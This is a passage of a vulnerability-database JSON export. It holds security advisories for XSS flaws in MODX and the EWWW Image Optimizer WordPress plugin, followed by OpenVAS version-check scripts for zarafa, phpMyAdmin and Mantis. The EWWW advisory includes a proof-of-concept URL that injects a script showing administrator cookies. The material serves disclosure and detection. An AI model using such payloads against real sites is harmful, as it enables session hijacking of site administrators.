The latest version of the Advisory is available on web page [1] in the References.\r\n\r\n", "edition": 1, "modified": "2014-10-14T00:00:00", "published": "2014-10-14T00:00:00", "id": "SECURITYVULNS:DOC:31189", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31189", "title": "Reflected Cross-Site Scripting (XSS) in MODX Revolution", "type": "securityvulns", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:54", "bulletinFamily": "software", "cvelist": ["CVE-2014-6243"], "description": "\r\n\r\nAdvisory ID: HTB23234\r\nProduct: EWWW Image Optimizer WordPress plugin\r\nVendor: Shane Bishop\r\nVulnerable Version(s): 2.0.1 and probably prior\r\nTested Version: 2.0.1\r\nAdvisory Publication: September 17, 2014 [without technical details]\r\nVendor Notification: September 17, 2014 \r\nVendor Patch: September 24, 2014 \r\nPublic Disclosure: October 8, 2014 \r\nVulnerability Type: Cross-Site Scripting [CWE-79]\r\nCVE Reference: CVE-2014-6243\r\nRisk Level: Low \r\nCVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)\r\nSolution Status: Fixed by Vendor\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered vulnerability in EWWW Image Optimizer WordPress plugin, which can be exploited to perform Cross-Site Scripting (XSS) attacks against administrator of a WordPress website with vulnerable plugin.\r\n\r\n\r\n1) Reflected Cross-Site Scripting (XSS) in EWWW Image Optimizer WordPress plugin: CVE-2014-6243\r\n\r\nInput passed via the "page" HTTP GET parameter to "/wp-admin/options-general.php" script is not properly sanitised before being returned to the user. 
A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.\r\n\r\nThe exploitation example below uses the "alert()" JavaScript function to display administrator's cookies:\r\n\r\nhttp://wordpress/wp-admin/options-general.php?page=ewww-image-optimizer/ewww-image-optimizer.php&pngout=failed&error=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E\r\n\r\n\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nUpdate to EWWW Image Optimizer 2.0.2.\r\n\r\nMore Information:\r\nhttps://wordpress.org/plugins/ewww-image-optimizer/changelog/\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nReferences:\r\n\r\n[1] High-Tech Bridge Advisory HTB23234 - https://www.htbridge.com/advisory/HTB23234 - Reflected Cross-Site Scripting (XSS) in EWWW Image Optimizer WordPress Plugin.\r\n[2] EWWW Image Optimizer WordPress plugin - http://www.shanebishop.net/ - Reduce file sizes for images within WordPress including NextGEN Gallery and GRAND FlAGallery. 
Uses jpegtran, optipng/pngout, and gifsicle.\r\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures.\r\n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.\r\n[5] ImmuniWeb\u00ae SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nDisclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.\r\n\r\n", "edition": 1, "modified": "2014-10-14T00:00:00", "published": "2014-10-14T00:00:00", "id": "SECURITYVULNS:DOC:31166", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31166", "title": "Reflected Cross-Site Scripting (XSS) in EWWW Image Optimizer WordPress Plugin", "type": "securityvulns", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "openvas": [{"lastseen": "2019-05-29T18:37:12", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-5450", "CVE-2014-5447", "CVE-2014-5449", "CVE-2014-5448"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2014-08-31T00:00:00", "id": "OPENVAS:1361412562310868143", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868143", "type": "openvas", "title": "Fedora Update for zarafa FEDORA-2014-9754", "sourceData": 
"###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for zarafa FEDORA-2014-9754\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868143\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-08-31 05:52:21 +0200 (Sun, 31 Aug 2014)\");\n script_cve_id(\"CVE-2014-5447\", \"CVE-2014-5448\", \"CVE-2014-5449\", \"CVE-2014-5450\");\n script_tag(name:\"cvss_base\", value:\"2.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:P/I:N/A:N\");\n script_name(\"Fedora Update for zarafa FEDORA-2014-9754\");\n script_tag(name:\"affected\", value:\"zarafa on Fedora 20\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-9754\");\n script_xref(name:\"URL\", 
value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-August/137158.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'zarafa'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC20\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"zarafa\", rpm:\"zarafa~7.1.10~4.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:37:33", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-5450", "CVE-2014-5447", "CVE-2014-5449", "CVE-2014-5448"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2014-09-03T00:00:00", "id": "OPENVAS:1361412562310868164", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868164", "type": "openvas", "title": "Fedora Update for zarafa FEDORA-2014-9768", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for zarafa FEDORA-2014-9768\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is 
distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868164\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-09-03 05:54:10 +0200 (Wed, 03 Sep 2014)\");\n script_cve_id(\"CVE-2014-5447\", \"CVE-2014-5448\", \"CVE-2014-5449\", \"CVE-2014-5450\");\n script_tag(name:\"cvss_base\", value:\"2.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:P/I:N/A:N\");\n script_name(\"Fedora Update for zarafa FEDORA-2014-9768\");\n script_tag(name:\"affected\", value:\"zarafa on Fedora 19\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-9768\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-September/137232.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'zarafa'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", 
re:\"ssh/login/release=FC19\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"zarafa\", rpm:\"zarafa~7.1.10~4.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:34:22", "description": "phpMyAdmin is prone to multiple cross-site scripting vulnerabilities.", "cvss3": {}, "published": "2017-08-18T00:00:00", "type": "openvas", "title": "phpMyAdmin Multiple Cross-Site Scripting Vulnerabilities - Jul14 (Linux)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-4986", "CVE-2014-4955"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310108229", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310108229", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_phpmyadmin_mult_xss_vuln_jul14_lin.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# phpMyAdmin Multiple Cross-Site Scripting Vulnerabilities - Jul14 (Linux)\n#\n# Authors:\n# Christian Fischer <christian.fischer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:phpmyadmin:phpmyadmin\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.108229\");\n script_version(\"$Revision: 12106 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-08-18 11:18:02 +0200 (Fri, 18 Aug 2017)\");\n script_tag(name:\"cvss_base\", value:\"3.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:N/I:P/A:N\");\n script_cve_id(\"CVE-2014-4986\", \"CVE-2014-4955\");\n script_name(\"phpMyAdmin Multiple Cross-Site Scripting Vulnerabilities - Jul14 (Linux)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"secpod_phpmyadmin_detect_900129.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"phpMyAdmin/installed\", \"Host/runs_unixoide\");\n\n script_xref(name:\"URL\", value:\"https://www.phpmyadmin.net/security/PMASA-2014-5/\");\n script_xref(name:\"URL\", value:\"https://www.phpmyadmin.net/security/PMASA-2014-6/\");\n\n script_tag(name:\"summary\", value:\"phpMyAdmin is prone to multiple cross-site scripting vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"affected\", value:\"phpMyAdmin 4.2.x prior to 4.2.6, 4.1.x prior to 4.1.14.2, and 4.0.x prior to 4.0.10.1.\");\n\n script_tag(name:\"solution\", value:\"Update to version 4.2.6, 4.1.14.2 or 4.0.10.1.\");\n\n 
script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\nif( ! vers = get_app_version( cpe:CPE, port:port ) ) exit( 0 );\n\nif( vers =~ \"^4\\.0\\.\" ) {\n if( version_is_less( version:vers, test_version:\"4.0.10.1\" ) ) {\n vuln = TRUE;\n fix = \"4.0.10.1\";\n }\n}\n\nif( vers =~ \"^4\\.1\\.\" ) {\n if( version_is_less( version:vers, test_version:\"4.1.14.2\" ) ) {\n vuln = TRUE;\n fix = \"4.1.14.2\";\n }\n}\n\nif( vers =~ \"^4\\.2\\.\" ) {\n if( version_is_less( version:vers, test_version:\"4.2.6\" ) ) {\n vuln = TRUE;\n fix = \"4.2.6\";\n }\n}\n\nif( vuln ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:fix );\n security_message( port:port, data:report );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:34:09", "description": "phpMyAdmin is prone to multiple cross-site scripting vulnerabilities.", "cvss3": {}, "published": "2017-08-18T00:00:00", "type": "openvas", "title": "phpMyAdmin Multiple Cross-Site Scripting Vulnerabilities - Jul14 (Windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-4986", "CVE-2014-4955"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310108228", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310108228", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_phpmyadmin_mult_xss_vuln_jul14_win.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# phpMyAdmin Multiple Cross-Site Scripting Vulnerabilities - Jul14 (Windows)\n#\n# Authors:\n# Christian Fischer <christian.fischer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it 
and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:phpmyadmin:phpmyadmin\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.108228\");\n script_version(\"$Revision: 12106 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-08-18 11:18:02 +0200 (Fri, 18 Aug 2017)\");\n script_tag(name:\"cvss_base\", value:\"3.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:N/I:P/A:N\");\n script_cve_id(\"CVE-2014-4986\", \"CVE-2014-4955\");\n script_name(\"phpMyAdmin Multiple Cross-Site Scripting Vulnerabilities - Jul14 (Windows)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"secpod_phpmyadmin_detect_900129.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"phpMyAdmin/installed\", \"Host/runs_windows\");\n\n script_xref(name:\"URL\", value:\"https://www.phpmyadmin.net/security/PMASA-2014-5/\");\n script_xref(name:\"URL\", value:\"https://www.phpmyadmin.net/security/PMASA-2014-6/\");\n\n script_tag(name:\"summary\", value:\"phpMyAdmin is prone to multiple cross-site 
scripting vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"affected\", value:\"phpMyAdmin 4.2.x prior to 4.2.6, 4.1.x prior to 4.1.14.2, and 4.0.x prior to 4.0.10.1.\");\n\n script_tag(name:\"solution\", value:\"Update to version 4.2.6, 4.1.14.2 or 4.0.10.1.\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\nif( ! vers = get_app_version( cpe:CPE, port:port ) ) exit( 0 );\n\nif( vers =~ \"^4\\.0\\.\" ) {\n if( version_is_less( version:vers, test_version:\"4.0.10.1\" ) ) {\n vuln = TRUE;\n fix = \"4.0.10.1\";\n }\n}\n\nif( vers =~ \"^4\\.1\\.\" ) {\n if( version_is_less( version:vers, test_version:\"4.1.14.2\" ) ) {\n vuln = TRUE;\n fix = \"4.1.14.2\";\n }\n}\n\nif( vers =~ \"^4\\.2\\.\" ) {\n if( version_is_less( version:vers, test_version:\"4.2.6\" ) ) {\n vuln = TRUE;\n fix = \"4.2.6\";\n }\n}\n\nif( vuln ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:fix );\n security_message( port:port, data:report );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:37:35", "description": "Multiple SQL injection vulnerabilities have been discovered in the Mantis\nbug tracking system.", "cvss3": {}, "published": "2014-09-20T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 3030-1 (mantis - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-1608", "CVE-2014-1609"], "modified": "2019-03-19T00:00:00", "id": "OPENVAS:1361412562310703030", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703030", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3030.nasl 14302 2019-03-19 08:28:48Z cfischer $\n# Auto-generated 
from advisory DSA 3030-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703030\");\n script_version(\"$Revision: 14302 $\");\n script_cve_id(\"CVE-2014-1608\", \"CVE-2014-1609\");\n script_name(\"Debian Security Advisory DSA 3030-1 (mantis - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-19 09:28:48 +0100 (Tue, 19 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-09-20 00:00:00 +0200 (Sat, 20 Sep 2014)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2014/dsa-3030.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", 
\"ssh/login/packages\", re:\"ssh/login/release=DEB7\");\n script_tag(name:\"affected\", value:\"mantis on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (wheezy), these problems have been fixed in\nversion 1.2.11-1.2+deb7u1.\n\nWe recommend that you upgrade your mantis packages.\");\n script_tag(name:\"summary\", value:\"Multiple SQL injection vulnerabilities have been discovered in the Mantis\nbug tracking system.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"mantis\", ver:\"1.2.11-1.2+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-07-28T10:48:26", "description": "Multiple SQL injection vulnerabilities have been discovered in the Mantis\nbug tracking system.", "cvss3": {}, "published": "2014-09-20T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 3030-1 (mantis - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-1608", "CVE-2014-1609"], "modified": "2017-07-13T00:00:00", "id": "OPENVAS:703030", "href": "http://plugins.openvas.org/nasl.php?oid=703030", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3030.nasl 6715 2017-07-13 09:57:40Z teissa $\n# Auto-generated from advisory DSA 3030-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective 
author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703030);\n script_version(\"$Revision: 6715 $\");\n script_cve_id(\"CVE-2014-1608\", \"CVE-2014-1609\");\n script_name(\"Debian Security Advisory DSA 3030-1 (mantis - security update)\");\n script_tag(name: \"last_modification\", value:\"$Date: 2017-07-13 11:57:40 +0200 (Thu, 13 Jul 2017) $\");\n script_tag(name: \"creation_date\", value:\"2014-09-20 00:00:00 +0200 (Sat, 20 Sep 2014)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2014/dsa-3030.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"mantis on Debian Linux\");\n script_tag(name: \"insight\", value: \"Mantis is an issue tracker that is implemented in PHP.\nThe main features include:\n\n* Web Based\n* Supports any platform that runs PHP\n* Available in 68 localizations\n* Customizable Issue Pages\n* 
Multiple Projects per instance\n* Support for Projects, Sub-Projects, and Categories.\n* Users can have a different access level per project\n* Changelog Support\n* Roadmap\n* User View Page\n* Search and Filter\n* Built-in Reporting (reports / graphs)\n* Time Tracking\n* Custom Fields\n* Email notifications\n* Users can monitor specific issues\n* Attachments\n* Issue Change History\n* RSS Feeds\n* Customizable issue workflow\n* Sponsorships Support\n* Export to csv, Microsoft Excel, Microsoft Word\n* No limit on the number of users, issues, or projects.\n* Public / Private Projects\n* Public / Private Notes\n* Public / Private Issues\n* Public / Private News\n* Issue Relationships\n* Authentication\n+ Default Mantis Authentication (recommended)\n+ LDAP Integration\n+ HTTP Basic Authentication Support\n+ Active Directory Integration (patches available)\n* Multi-DBMS Support (using ADODB)\n+ MySQL\n+ MS SQL\n+ PostgreSQL\n+ Oracle (experimental)\n* Webservice (SOAP) interface\n* and more\");\n script_tag(name: \"solution\", value: \"For the stable distribution (wheezy), these problems have been fixed in\nversion 1.2.11-1.2+deb7u1.\n\nWe recommend that you upgrade your mantis packages.\");\n script_tag(name: \"summary\", value: \"Multiple SQL injection vulnerabilities have been discovered in the Mantis\nbug tracking system.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software version using the apt package manager.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"mantis\", ver:\"1.2.11-1.2+deb7u1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mantis\", ver:\"1.2.11-1.2+deb7u1\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mantis\", ver:\"1.2.11-1.2+deb7u1\", 
rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mantis\", ver:\"1.2.11-1.2+deb7u1\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:37:32", "description": "There are multiple SQL Injection vulnerabilities in MantisBT which allow\n a remote attacker to access or modify data.", "cvss3": {}, "published": "2014-03-25T00:00:00", "type": "openvas", "title": "MantisBT Multiple SQL Injection Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-1608", "CVE-2014-1609"], "modified": "2018-12-18T00:00:00", "id": "OPENVAS:1361412562310105902", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310105902", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_mantis_multiple_sql_inj_vuln.nasl 12818 2018-12-18 09:55:03Z ckuersteiner $\n#\n# MantisBT Multiple SQL Injection Vulnerabilities\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
